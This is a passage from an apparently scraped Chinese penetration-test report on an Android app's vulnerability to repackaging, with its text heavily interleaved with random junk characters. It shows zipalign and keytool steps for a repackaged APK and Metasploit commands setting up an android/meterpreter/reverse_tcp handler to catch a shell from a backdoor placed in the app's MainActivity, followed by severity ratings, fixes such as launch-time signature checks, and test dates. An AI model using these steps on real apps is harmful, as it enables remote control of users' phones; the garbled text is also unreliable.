3 _, a* v7 y3 s, ]1 K. m, I9 F : J. _+ A( t- k4 J keytool -printcert -jarfile repackaged.apk F* Q7 n2 \& P, Q0 f K0 ]4 R 4 K2 u' @" V( M" O6 C! }( Q

' j8 t/ [4 k O9 A& {' |) W+ P' o; A 对齐 ! V# d: q( T# [6 \! O 8 T+ M: R# N9 E

" _9 V! B5 i2 S( a' n 0 \+ W; v- u Z0 H% P& S0 k" Y 字节对齐优化 ! ^8 ?$ H+ k$ C& q5 A: R* e 5 f- k5 K s. t% m. N% g/ l

5 U B+ U9 l6 o1 ~ 1 s O+ {- _' p9 N: H# a3 ] zipalign -v 4 repackaged.apk final.apk - o& I/ z+ u6 t0 l) z. i# V ) W1 [: j( a# ~" J+ R& G5 C/ S

1 y, O7 a$ L0 b* _. j3 @% r" j! Y& v% y6 Z5 I. m 检查是否对齐 : J! D) u+ I9 d( N& v# L ! ? `2 T" Z0 [5 }' Q

2 v3 ^; M# R; b( s, k/ _4 E ; [, w' G. S2 E% z zipalign -c -v 4 final.apk 3 ^" |$ e. G, b+ m9 q; J A& T* n ( g2 ~4 T* ]1 _6 i- J

( K6 I$ s7 J- U' d/ ~% q$ r / j9 b4 T& v1 P 注：zipalign可以在V1签名后执行，但zipalign不能在V2签名后执行,只能在V2签名之前执行 - B2 T! A) d9 M2 }' K: a 1 [4 J, A) k! d/ J( | t, \

7 t3 S( r" j! J. R# M - q; c/ a- w9 @. Z 启动Metasploit控制台，配置参数等待上线 6 `3 R" @2 F l+ p; ]6 f9 ~/ @* p7 M+ q1 |% C

0 ]5 K2 n1 ?: X+ o+ I2 w , z0 v0 e1 b! _9 X& q3 S 在终端依次输入如下命令 * [6 B0 X- o! r7 I" Q" L. W2 c 5 P$ Y. Y9 S. b! ~

# E; B: e7 `0 z% @ # w7 i$ m' s" W ^! a msfconsole , @5 k( [- c+ i8 V & m/ K7 ?; B, O) {# J

; U* L. C/ [2 c; ^) U) C. t 7 U. p5 U, X( g) `/ ?: P. a use exploit/multi/handler : W# a$ n ?. a+ K- }' K - z5 M; h# \6 \. [ B* l

8 d% z7 x/ V- T5 w6 n* a : h5 p' W$ Q+ r- k, Z set PAYLOAD android/meterpreter/reverse_tcp 2 p) q2 H% ^3 ~ . B3 o z: T. Q5 A

* k& \, r; i: ]: i5 a / @' s, d& i5 o2 | set LHOST 192.xxx.xx.xx / V; S k0 Y2 j2 F 5 _7 m6 m* |" G1 h7 `

' M. R9 b" l' K# s! J8 s2 @3 b $ I7 {4 ~! J; S- m( j set LPORT 4444 * ]' n, f8 L3 R) m * W4 ^" M8 i3 e& n9 G5 [9 f( d

( @; |7 w0 E% E9 v; w- g O# [' _7 O$ J7 t- \1 i N exploit 7 a+ B+ N% E; {0 ^) f! \6 K# \ $ Q* h- o1 z& H

( J1 L9 ~' F- a6 T! V- Q9 J. D. d ` # |# P: O4 Y' k" M2 D 之前我们把入口放在 MainActivity 的 onCreate 方法中，当启动目标应用进入该界面，就会连接成功，如下图： 1 B6 i0 x4 O# r- W/ I0 x. A0 G/ W * D) J' Y3 n6 H) y

0 _. s) F! H, ^' V$ v- J1 D9 P( M4 l/ c' T+ s5 ]' L 漏洞危害：中 " t& m0 F0 [+ ^) C1 ~) I & o2 L: ^# V8 w

/ M4 J+ a& X# h: O$ e4 s 7 d+ w) h/ W3 a0 u& B9 h3 r % K6 E9 n* g* Z8 x2 l" ]. Q: e& U - d0 k& Y- V5 W/ y 严重程度 * G* U$ s, X# m9 [" ]0 ]: P % B8 {" p) m* m: t+ b , s6 l v- o3 \|. D$ i 0 p8 E: v* c6 i$ z	8 t1 g. [3 f1 B$ Y. d5 k: } / \|- O5 i" c8 I9 v+ } 1 z J9 _" g+ W5 [8 d + J0 V0 r4 Q H 高 8 T+ y& t+ {* {. u) k3 I! y: d( L6 P* C" W, T 9 k. h# ?; D9 Y/ h; V( ^1 h6 G1 ?0 k: u: U: e' ^	% @* f5 r+ P$ v; ?6 `0 r 6 \|) Z9 _0 l i# q3 y 6 B! _7 e" \|2 O' @& }+ R6 k3 b( S6 K 7 r0 y, ]. @, g1 t. _ ■ ; ^1 t# \|2 W r+ D( T& w: u 9 d: }0 N- a9 u8 v4 O1 Y % z" D% ]8 f. m6 g1 n ( U9 y- r2 ?. H' V0 {3 D3 r	$ R/ d$ o1 o1 b% O8 B: O# V$ e/ ]1 G3 c. ^/ j/ \|3 g+ r 0 N) S) { T- O & _" c+ [) h2 y 中 6 [# ~" d' k l. m3 \|1 F6 p9 H % \+ p2 F2 y7 l& H t) ~) d6 C - i& @. Q! y J# c 2 K3 A' e4 X; I% E4 w( c	; d8 z' N7 l, c% w, I # U9 J' K# M" W4 S) v4 i( g* A$ J + R) u0 V7 K4 f) [4 S$ }: @$ m ) o. ?3 H$ ~* u! Z: @ 5 {- B% O9 e& _" g; Q0 ~: K' K: H# O) B , H- I/ k$ l" V # a- f- \|) c! S3 l+ `' E 4 \|% E; W' p! h( z; y ) ^# ]- Y* C/ C" S" K# R- p	, a2 h4 s* m! B' F: r& Z+ ^* \6 J" Q7 Y c+ L' f5 w% ^# B ) F( D ?/ q# P2 V4 k- @, U( X - ?' t- c) d/ \|3 O$ f 低 3 G, K4 M* k' x4 d 7 f0 g' a. m, k% Q! E- L7 Q % U4 h0 T! m; s3 I: E 4 g/ y- Z! y: ^5 [9 [0 {8 E8 r	?+ G/ E; m. T7 f3 N / n. M& j7 w; z# m - g& Y `( J9 _8 {& q; ]; k; i , E6 g7 T z( U7 L/ U" j" \ 8 o. ?) }1 {: X6 l0 e2 T: d* r $ _" X3 v4 G5 h5 w* `# U4 B $ I2 t- W: u" c! `7 N- p6 w9 \- Y" l- W+ w7 @# {$ { " Z8 N D; A/ [( ]3 G0 I 1 \. E5 J! J; O+ j3 i) }" ?* S

: v5 Q; y1 h4 C* N g& I 4 X: ~+ W' y" U, ] 4 P: c- v( Y+ U3 G! I* i1 i. s5 R2 Y$ Z- x( f, i

0 S; L$ I/ U" z q5 s ) M# n& y% A$ w( ]; \2 Z# u 修复方法： 4 U" o* d! `+ ]; l 2 V' j! q: U& j8 z0 A$ e( @& f- Y5 u

! i, M8 f' J# v/ x- g+ D4 N) b' ~ 1.在 APP 启动时应做签名校验防止二次打包。
$ Y/ w: S4 B f* K I% E& Y- w B6 v% Z2 X 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 + y7 V2 _$ ?; a8 Z* e 4 v/ _7 e$ z/ {% Q# f' \& ^3 ?

' l: Q) Z3 W. ]. O9 d* d+ e5 t3 D$ D% x2 v* p2 M0 F 4 X! h+ L% @1 m7 M2 V! b8 B# d * ~6 }$ l5 n: y5 W

) [1 f; S" J1 E9 V; b0 o! O # E% l0 x3 L* o4 ` s
- Q4 N1 G" c& r4 ^0 c1 Q ' K7 N9 q2 D: w9 O" w$ a

1 \8 g+ v! C: r+ y, `9 H- ~4 [/ K5 b 5 a5 U( \$ W# M$ f6 ]! ]% y* O" G5 l / B4 ~; B/ }; q: M+ s + U0 f9 G7 s+ ~ 渗透测试时间 0 U+ j# u) C" ~0 e 9 _/ M2 m0 [% B( }- w, B7 U- y! Q , X( J8 m3 a, N5 {; x6 a. J . L8 t6 Y( E. A6 y% u
$ \4 z4 ]& U, @; x; ] 4 j$ \|/ }" a& D9 G: u & P& f- ^, c+ s. } ) k9 V" C6 l' R, D4 R; W8 T. a 起始时间 0 n9 ~* w( Z( e1 K( X) I( j . g6 X- o& z4 F, L ( w+ X( M0 V3 \|9 I4 h% g9 Y ! b9 A8 w" M) j, u0 s. [1 d) k! l	# {8 \2 C2 n+ z r ) g7 T! i9 C! l7 @+ f! g8 q# x 3 m- M& A! w1 A; i* C+ i - r: U' y+ w2 G 2020年4月6日 ; q9 {$ `8 {9 r" k ) o7 p% s$ \|" I( \& C; V* W 0 d2 W, t# y+ }& G& w0 }8 V \5 ~+ F) j7 C8 R8 f6 }- z$ d
$ O# C+ W( M9 \ : @2 O2 {/ f0 F6 I$ w# \| 9 Z/ y3 a% [) P3 `+ ^- [- u# {4 b6 p3 ^. j5 y 结束时间 - Y9 s; H" k: u6 S$ B% {" u1 F# q# I3 \| j. u! B3 x 1 `& S3 l5 x$ r# ^# l P* [$ a8 Y- E / s1 \7 M! D# \! C	5 q" g- J0 }. V6 a" P; g6 z6 s" E# J* S $ e1 D8 \/ A# v3 B% \|0 S, k: Q8 C$ `* K: u) K 2020年4月9日 5 A$ \|/ W# U8 ]$ f2 u2 G% }8 e2 y! \|2 K" s( k9 a " D& Q( {( T# e 9 p0 K! \- `( Q

4 q, {% B' Y# ^' D Q K; p2 R3 q8 g) y : X! }6 E* \1 E' X ) p( ]% I' e4 l+ e& R6 m, A3 B/ P 序号 ' ^; z' P+ J8 q1 z+ j; f' C# `$ ]1 }+ n 9 D9 N! }3 h$ b0 _, G4 s: C % ^- \5 ]2 ?- n2 O	3 V3 H# }( A, j/ K* I 8 A# L2 q6 u; E* P 4 f, ]; S* H' ~* x1 f# r$ w $ e, `3 B: r# z& \# V 测试对象 $ ~8 ^( l4 k7 H* G* x6 n/ g 2 s5 E* @. A7 s7 ^2 T5 A O) w; T8 e) R3 K% t6 R L, ~ 5 T! j7 q8 m; T2 @, X5 z	4 u3 ~0 O5 R* t+ L * k$ d; S* t9 g ; q+ I' g, H3 T$ o9 g% Y 4 A# {3 e7 [# m$ C! k 测试地址 5 B" N; K4 J' Q* H; t( ` 0 \. j. ^- w. M0 Q" a, J ; z2 k& I5 A9 _6 N$ ^! P0 [ 1 c0 a" S5 q) L8 F! v5 x	% z1 y9 c9 u' o2 }$ n' I! ] 1 t1 c0 U. u$ t8 T% g) Y1 F/ \| ) d% [1 ]( }; m" d9 v$ `- Y ! h8 }; k4 u3 Y; o% b' \ 安全漏洞 0 E" y+ D6 g- R- W( \8 a 8 T- j) [8 V6 S 5 \|2 E6 n' k0 g4 s; e- n 4 v. \|! l' ? `
8 ]5 X8 {( x: T6 \ 0 j2 _, ~# O! V5 K 3 ?- Y7 I9 q# n5 a' E 0 x+ v) ?" i& E# i$ n% @ 1 8 i. y& O4 T h' {6 i n 6 {. e1 m! N9 g d/ h1 r8 J3 H% E# s % `) j4 q3 D( ~& P9 \|! Y	5 A2 L/ n6 I# g1 T5 l- R/ h( u; W. _) L7 Q0 Y$ W O# i ~: @( o, V6 C0 C/ h! ~1 a' w $ t: _( ]1 I4 q5 m8 a4 `! V 某某某安卓APP % N( F% T V6 v- t; Z5 c0 \|3 a7 [0 \|9 i0 Y" Q9 o # \# p7 H$ W8 `" C9 o + l) a$ z' f8 j% o1 ~! o c, t	. \; Q. d* {( J) w- \| 0 ]4 ^# z p* u, \- O$ y ( f0 [. M, A/ T ; g7 b, @$ s, \4 [. ? ' E( S8 \|0 X! C7 H $ x1 [& n+ c) m+ H- i 2 i! v* j8 x' c' t, @; t7 y6 O8 _0 V9 y- k5 L& l3 X8 N1 D! I1 B. I	4 r9 r: c. s' T1 K/ W, ?( t! y- n! o 2 M3 W3 H9 _% o" e% ~$ h% I / K; Q4 q4 \2 @( Q2 Z 2 q" \|5 v) x9 H# G2 { 2 2 P9 b1 H/ f' R8 t0 U 6 U8 c# I3 C P( i4 w * M' U1 F5 s: B3 l8 U : b$ Y- x4 A1 R; w7 i8 f' F& O$ `

中国网络渗透测试联盟